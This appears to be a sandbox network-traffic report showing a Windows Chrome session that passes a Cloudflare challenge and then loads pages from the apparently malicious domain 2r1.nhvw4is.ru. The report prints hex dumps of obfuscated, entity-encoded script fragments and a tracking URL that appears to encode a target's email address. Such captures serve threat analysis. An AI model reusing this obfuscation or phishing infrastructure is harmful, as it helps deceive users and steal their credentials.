                                                                                                                                                              2024-01-17 16:39:29 UTC579INData Raw: 64 33 64 76 41 35 62 2f 58 30 2f 50 6b 32 2f 6e 32 32 77 59 46 37 2b 76 53 43 75 67 4b 43 67 66 73 43 2b 38 62 39 65 77 57 44 50 72 59 47 76 77 46 46 2f 73 6b 42 78 30 69 46 51 59 4b 4a 67 77 4e 4a 52 41 4b 43 65 34 6c 39 42 4d 46 2b 54 77 57 4e 42 38 41 4b 67 30 51 4f 68 6f 67 41 78 63 78 50 69 68 4e 4a 6b 49 6e 42 79 6f 77 4d 78 49 71 4d 78 59 56 4f 44 55 6f 4e 44 6f 34 47 31 34 2f 4c 7a 78 63 4f 42 34 66 4a 6b 4e 64 50 47 68 44 58 32 5a 4a 52 54 39 4d 51 31 4a 55 4e 30 68 4d 62 6b 52 52 62 48 52 78 66 57 46 7a 66 6e 35 68 50 6e 61 46 63 30 4e 55 67 57 46 64 58 47 70 36 59 45 74 6d 67 5a 64 58 62 58 47 4d 61 49 79 4e 66 57 69 68 69 33 47 41 62 58 36 45 5a 36 69 53 5a 4b 5a 32 68 61 4f 4d 5a 35 74 39 62 33 32 66 62 33 65 30 6f 34 61 55 75 5a 57 64 74 6e
                                                                                                                                                              Data Ascii: d3dvA5b/X0/Pk2/n22wYF7+vSCugKCgfsC+8b9ewWDPrYGvwFF/skBx0iFQYKJgwNJRAKCe4l9BMF+TwWNB8AKg0QOhogAxcxPihNJkInByowMxIqMxYVODUoNDo4G14/LzxcOB4fJkNdPGhDX2ZJRT9MQ1JUN0hMbkRRbHRxfWFzfn5hPnaFc0NUgWFdXGp6YEtmgZdXbXGMaIyNfWihi3GAbX6EZ6iSZKZ2haOMZ5t9b32fb3e0o4aUuZWdtn
                                                                                                                                                              2024-01-17 16:39:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              36192.168.2.449796104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:30 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1369030472:1705508754:EmThWJxmRohva1owlnsvJ5GEpCR6N4Hxvwfz_SQ26Ik/847008825fbf8ce0/150b112ab8f1d86 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:30 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:30 GMT
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                              cf-chl-out: 0lU00a3FwGOTtMXp19bqEQ==$6KyEDogylmqQUKtZM8zahA==
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008de1ed817a9-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:30 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                              Data Ascii: 7invalid
                                                                                                                                                              2024-01-17 16:39:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              37192.168.2.449795172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:30 UTC712OUTPOST /0wNwOpkNampQzdEFzER HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 690
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygYh6PcanqYg2adFU
                                                                                                                                                              Accept: */*
                                                                                                                                                              Origin: https://2r1.nhvw4is.ru
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:30 UTC690OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 67 59 68 36 50 63 61 6e 71 59 67 32 61 64 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 54 6a 68 72 73 46 77 51 42 37 70 46 4e 74 54 4c 6d 33 49 53 66 38 58 62 67 47 54 77 50 65 52 76 6b 70 46 52 68 47 78 79 59 7a 49 54 5f 5f 47 56 6f 4f 32 57 78 32 33 61 38 5f 54 2d 51 58 69 46 4b 46 6f 63 77 30 56 33 2d 43 41 6c 50 4b 61 49 6e 56 50 4f 45 79 69 53 56 68 68 53 32 45 5f 48 50 74 76 73 68 56 70 2d 53 37 4c 44 46 6c 6e 6b 5f 77 32 4d 48 62 35 68 41 62 34 5f 4d 6b 47 44 6e 33 4e 32 4d 33 62 47 64 69 2d 6b 4a 44 67 74 4a 34 47
                                                                                                                                                              Data Ascii: ------WebKitFormBoundarygYh6PcanqYg2adFUContent-Disposition: form-data; name="cf-turnstile-response"0.TjhrsFwQB7pFNtTLm3ISf8XbgGTwPeRvkpFRhGxyYzIT__GVoO2Wx23a8_T-QXiFKFocw0V3-CAlPKaInVPOEyiSVhhS2E_HPtvshVp-S7LDFlnk_w2MHb5hAb4_MkGDn3N2M3bGdi-kJDgtJ4G
                                                                                                                                                              2024-01-17 16:39:30 UTC716INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:30 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xDqUpoHtLAdqas3IVb8TBgfFU66xWZbDryfjSbf19%2Fd0Fle0xV0ryFsIlqJNyuXNjAf2E9XIMoDq35edkS7hdZwT56k7frpRWx%2BNh1IDRYRCuSSxdRyaFV7Wpn42z4cJnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008dd59817d05-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              38192.168.2.449797172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:31 UTC770OUTGET / HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:32 UTC741INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:32 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WyDEWp9Tj56hs%2FwMnl1BAZsUfYVFecYmhfGFYQqSfmAbY9iQkv7pFP6xZFYpSQAug9GKjKxS8dzeMO3tpe7H371a%2FdZSWLn8rw%2BvVrfdrxMbw0Kj6zAZyfqBmuO7svVCZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008e48ed7426d-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:32 UTC628INData Raw: 31 65 66 65 0d 0a 3c 46 44 73 50 52 68 64 6f 54 5a 71 20 72 53 70 62 76 57 66 52 44 69 56 50 69 41 75 6d 42 4a 51 7a 6b 74 41 55 59 4e 41 6a 3d 22 26 23 38 30 3b 26 23 37 32 3b 26 23 37 38 3b 26 23 31 30 36 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 31 30 38 3b 26 23 31 31 39 3b 26 23 31 30 30 3b 26 23 36 38 3b 26 23 35 33 3b 26 23 31 30 39 3b 26 23 31 30 30 3b 26 23 38 37 3b 26 23 35 33 3b 26 23 31 30 36 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 31 30 38 3b 26 23 31 31 38 3b 26 23 39 38 3b 26 23 31 30 35 3b 26 23 36 36 3b 26 23 31 31 38 3b 26 23 38 32 3b 26 23 37 31 3b 26 23 38 32 3b 26 23 31 32 31 3b 26 23 38 32 3b 26 23 34 38 3b 26 23 39 30 3b 26 23 37 35 3b 26 23 38 36 3b 26 23 31 31 30 3b 26 23 36 36 3b 26 23 31 32 31 3b 26 23 38 37 3b 26 23 37 30 3b
                                                                                                                                                              Data Ascii: 1efe<FDsPRhdoTZq rSpbvWfRDiVPiAumBJQzktAUYNAj="&#80;&#72;&#78;&#106;&#99;&#109;&#108;&#119;&#100;&#68;&#53;&#109;&#100;&#87;&#53;&#106;&#100;&#71;&#108;&#118;&#98;&#105;&#66;&#118;&#82;&#71;&#82;&#121;&#82;&#48;&#90;&#75;&#86;&#110;&#66;&#121;&#87;&#70;
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 23 38 38 3b 26 23 37 32 3b 26 23 37 38 3b 26 23 36 35 3b 26 23 38 38 3b 26 23 38 33 3b 26 23 31 31 35 3b 26 23 31 30 37 3b 26 23 37 36 3b 26 23 31 32 32 3b 26 23 31 31 36 3b 26 23 31 32 31 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 34 39 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 35 32 3b 26 23 31 30 33 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 38 35 3b 26 23 31 31 37 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 38 36 3b 26 23 31 32 32 3b 26 23 31 30 30 3b 26 23 36 37 3b 26 23 31 30 34 3b 26 23 31 30 36 3b 26 23 38 35 3b 26 23 31 30 38 3b 26 23 38 32 3b 26 23 31 31 38 3b 26 23 38 36 3b 26 23 31 30 39 3b 26 23 39 30 3b 26 23 31 31 34 3b 26 23 38 37 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 31 31 39 3b 26 23 38 31 3b 26 23 34 39 3b 26 23 38 32 3b 26 23
                                                                                                                                                              Data Ascii: #88;&#72;&#78;&#65;&#88;&#83;&#115;&#107;&#76;&#122;&#116;&#121;&#90;&#88;&#82;&#49;&#99;&#109;&#52;&#103;&#99;&#109;&#85;&#117;&#100;&#71;&#86;&#122;&#100;&#67;&#104;&#106;&#85;&#108;&#82;&#118;&#86;&#109;&#90;&#114;&#87;&#71;&#57;&#119;&#81;&#49;&#82;&#
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 26 23 31 30 37 3b 26 23 39 38 3b 26 23 37 32 3b 26 23 31 30 30 3b 26 23 31 31 37 3b 26 23 38 32 3b 26 23 38 36 3b 26 23 37 30 3b 26 23 35 31 3b 26 23 31 30 30 3b 26 23 38 37 3b 26 23 31 30 38 3b 26 23 34 38 3b 26 23 31 30 31 3b 26 23 31 30 39 3b 26 23 35 33 3b 26 23 31 30 35 3b 26 23 38 33 3b 26 23 31 32 31 3b 26 23 36 35 3b 26 23 35 34 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 31 30 30 3b 26 23 34 39 3b 26 23 38 34 3b 26 23 34 38 3b 26 23 31 30 34 3b 26 23 31 31 35 3b 26 23 38 36 3b 26 23 38 37 3b 26 23 38 32 3b 26 23 38 30 3b 26 23 39 37 3b 26 23 37 30 3b 26 23 38 32 3b 26 23 31 30 35 3b 26 23 38 33 3b 26 23 31 30 38 3b 26 23 31 31 31 3b 26 23 35 35 3b 26 23 31 30 32 3b 26 23 38 33 3b 26 23 36 36 3b 26 23 31 30 36 3b 26 23 38 39 3b 26 23 38 38 3b 26 23 38
                                                                                                                                                              Data Ascii: &#107;&#98;&#72;&#100;&#117;&#82;&#86;&#70;&#51;&#100;&#87;&#108;&#48;&#101;&#109;&#53;&#105;&#83;&#121;&#65;&#54;&#73;&#71;&#100;&#49;&#84;&#48;&#104;&#115;&#86;&#87;&#82;&#80;&#97;&#70;&#82;&#105;&#83;&#108;&#111;&#55;&#102;&#83;&#66;&#106;&#89;&#88;&#8
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 3b 26 23 35 36 3b 26 23 31 30 32 3b 26 23 36 37 3b 26 23 36 36 3b 26 23 39 38 3b 26 23 38 38 3b 26 23 38 33 3b 26 23 31 30 38 3b 26 23 39 38 3b 26 23 37 37 3b 26 23 31 30 38 3b 26 23 34 38 3b 26 23 35 35 3b 26 23 31 30 30 3b 26 23 31 30 39 3b 26 23 37 30 3b 26 23 31 32 31 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 39 30 3b 26 23 36 39 3b 26 23 31 30 30 3b 26 23 34 39 3b 26 23 31 30 38 3b 26 23 31 31 35 3b 26 23 31 30 30 3b 26 23 38 38 3b 26 23 37 30 3b 26 23 31 31 39 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 37 34 3b 26 23 37 35 3b 26 23 39 30 3b 26 23 34 38 3b 26 23 35 33 3b 26 23 31 30 34 3b 26 23 39 38 3b 26 23 36 37 3b 26 23 36 35 3b 26 23 35 37 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 35 33 3b 26 23 31 30 38 3b 26 23 31 30 30 3b 26 23 31 32 31 3b 26 23 36 36
                                                                                                                                                              Data Ascii: ;&#56;&#102;&#67;&#66;&#98;&#88;&#83;&#108;&#98;&#77;&#108;&#48;&#55;&#100;&#109;&#70;&#121;&#73;&#71;&#90;&#69;&#100;&#49;&#108;&#115;&#100;&#88;&#70;&#119;&#83;&#69;&#74;&#75;&#90;&#48;&#53;&#104;&#98;&#67;&#65;&#57;&#73;&#71;&#53;&#108;&#100;&#121;&#66
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 36 37 3b 26 23 31 30 30 3b 26 23 37 30 3b 26 23 38 35 3b 26 23 31 31 32 3b 26 23 37 33 3b 26 23 37 32 3b 26 23 31 31 36 3b 26 23 31 30 36 3b 26 23 38 35 3b 26 23 31 30 38 3b 26 23 38 32 3b 26 23 31 31 38 3b 26 23 38 36 3b 26 23 31 30 39 3b 26 23 39 30 3b 26 23 31 31 34 3b 26 23 38 37 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 31 31 39 3b 26 23 38 31 3b 26 23 34 39 3b 26 23 38 32 3b 26 23 38 34 3b 26 23 39 37 3b 26 23 31 30 38 3b 26 23 31 30 33 3b 26 23 31 30 33 3b 26 23 38 30 3b 26 23 38 33 3b 26 23 36 36 3b 26 23 38 32 3b 26 23 38 32 3b 26 23 31 30 38 3b 26 23 31 30 34 3b 26 23 35 34 3b 26 23 38 32 3b 26 23 37 32 3b 26 23 37 34 3b 26 23 31 31 30 3b 26 23 38 39 3b 26 23 31 30 37 3b 26 23 31 31 36 3b 26 23 37 32 3b 26 23 37 35 3b 26 23 37 31 3b 26 23 38 36 3b
                                                                                                                                                              Data Ascii: 67;&#100;&#70;&#85;&#112;&#73;&#72;&#116;&#106;&#85;&#108;&#82;&#118;&#86;&#109;&#90;&#114;&#87;&#71;&#57;&#119;&#81;&#49;&#82;&#84;&#97;&#108;&#103;&#103;&#80;&#83;&#66;&#82;&#82;&#108;&#104;&#54;&#82;&#72;&#74;&#110;&#89;&#107;&#116;&#72;&#75;&#71;&#86;
                                                                                                                                                              2024-01-17 16:39:32 UTC1369INData Raw: 31 37 3b 26 23 38 36 3b 26 23 38 37 3b 26 23 37 38 3b 26 23 38 38 3b 26 23 31 30 31 3b 26 23 37 31 3b 26 23 31 30 30 3b 26 23 31 32 31 3b 26 23 31 30 31 3b 26 23 31 30 38 3b 26 23 31 30 38 3b 26 23 38 30 3b 26 23 39 37 3b 26 23 36 38 3b 26 23 35 36 3b 26 23 35 30 3b 26 23 37 37 3b 26 23 38 37 3b 26 23 39 30 3b 26 23 31 30 35 3b 26 23 37 38 3b 26 23 36 38 3b 26 23 36 39 3b 26 23 35 30 3b 26 23 39 30 3b 26 23 31 30 36 3b 26 23 37 34 3b 26 23 31 30 39 3b 26 23 37 34 3b 26 23 31 32 31 3b 26 23 36 35 3b 26 23 31 31 34 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 37 34 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 35 30 3b 26 23 36 39 3b 26 23 31 31 31 3b 26 23 38 39 3b 26 23 34 39 3b 26 23 37 34 3b 26 23 38 35 3b 26 23 39 38 3b 26 23 34 39 3b 26 23 39 30 3b 26 23 31 30 39
                                                                                                                                                              Data Ascii: 17;&#86;&#87;&#78;&#88;&#101;&#71;&#100;&#121;&#101;&#108;&#108;&#80;&#97;&#68;&#56;&#50;&#77;&#87;&#90;&#105;&#78;&#68;&#69;&#50;&#90;&#106;&#74;&#109;&#74;&#121;&#65;&#114;&#73;&#71;&#74;&#48;&#98;&#50;&#69;&#111;&#89;&#49;&#74;&#85;&#98;&#49;&#90;&#109
                                                                                                                                                              2024-01-17 16:39:32 UTC469INData Raw: 26 23 38 38 3b 26 23 38 32 3b 26 23 31 31 32 3b 26 23 39 38 3b 26 23 35 30 3b 26 23 35 32 3b 26 23 31 31 37 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 38 36 3b 26 23 31 31 39 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 30 36 3b 26 23 39 30 3b 26 23 38 33 3b 26 23 31 30 34 3b 26 23 31 30 39 3b 26 23 38 32 3b 26 23 37 32 3b 26 23 31 30 30 3b 26 23 39 30 3b 26 23 39 38 3b 26 23 37 32 3b 26 23 38 36 3b 26 23 31 32 30 3b 26 23 39 39 3b 26 23 36 39 3b 26 23 31 30 34 3b 26 23 36 37 3b 26 23 38 33 3b 26 23 31 30 39 3b 26 23 31 30 30 3b 26 23 37 39 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 31 31 39 3b 26 23 31 31 32 3b 26 23 37 39 3b 26 23 35 31 3b 26 23 34 38 3b 26 23 35 36 3b 26 23 37 36 3b 26 23 35 31 3b 26 23 37 38 3b 26 23 31 30 36 3b 26 23 39 39 3b
                                                                                                                                                              Data Ascii: &#88;&#82;&#112;&#98;&#50;&#52;&#117;&#99;&#109;&#86;&#119;&#98;&#71;&#70;&#106;&#90;&#83;&#104;&#109;&#82;&#72;&#100;&#90;&#98;&#72;&#86;&#120;&#99;&#69;&#104;&#67;&#83;&#109;&#100;&#79;&#89;&#87;&#119;&#112;&#79;&#51;&#48;&#56;&#76;&#51;&#78;&#106;&#99;
                                                                                                                                                              2024-01-17 16:39:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              39192.168.2.449801172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:31 UTC403OUTGET /0wNwOpkNampQzdEFzER HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:31 UTC608INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:31 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SEl1cwlNT5fX6OW%2BXZ39TD0MAMRsWIJvQdXyp2w2aXwLnNyKr8rU0fDEpWoVIq%2BOOWLT4jkVEBOGpuO6f8vmCUBHOdw%2BFHZGCduimeUDwKgWUggughyeOToQnh4pIlxr4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008e6d83d43ec-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              40192.168.2.449798172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:32 UTC820OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:32 UTC709INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:32 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BQbjz4ZXlhvU4T10mkYcfiGRHVVVUyzUYLiaWx7am4XNyhyzesycFtdUAm4bt%2BY2Uv7FGBkypUxAMi9sscgRO2LiRsMsBkBs3%2BijgSalQOeX0qCtUa021xzZkaUBDGwHbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008ea2ea08cee-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:32 UTC660INData Raw: 37 63 65 63 0d 0a 3c 4b 54 6a 42 4f 55 45 4b 6e 53 58 46 44 56 56 52 6c 6b 6b 70 64 63 45 6a 48 5a 56 45 6a 4b 20 5a 6d 74 4f 54 46 6b 43 63 7a 76 48 3d 22 26 23 38 30 3b 26 23 36 37 3b 26 23 37 30 3b 26 23 36 39 3b 26 23 38 34 3b 26 23 34 38 3b 26 23 37 38 3b 26 23 38 35 3b 26 23 38 37 3b 26 23 38 36 3b 26 23 36 36 3b 26 23 37 30 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 31 30 34 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 31 31 39 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 37 31 3b 26 23 31 30 34 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 31 31 39 3b 26 23 31 30 33 3b 26 23 39 30 3b 26 23 37 31 3b 26 23 31 30 38 3b 26 23 31 32 31 3b 26 23 38 30 3b 26 23 38 33 3b 26 23 37 34 3b 26 23 31 31 35 3b 26 23 31 30 30 3b 26 23 37 32 3b 26 23 37 33
                                                                                                                                                              Data Ascii: 7cec<KTjBOUEKnSXFDVVRlkkpdcEjHZVEjK ZmtOTFkCczvH="&#80;&#67;&#70;&#69;&#84;&#48;&#78;&#85;&#87;&#86;&#66;&#70;&#73;&#71;&#104;&#48;&#98;&#87;&#119;&#43;&#80;&#71;&#104;&#48;&#98;&#87;&#119;&#103;&#90;&#71;&#108;&#121;&#80;&#83;&#74;&#115;&#100;&#72;&#73
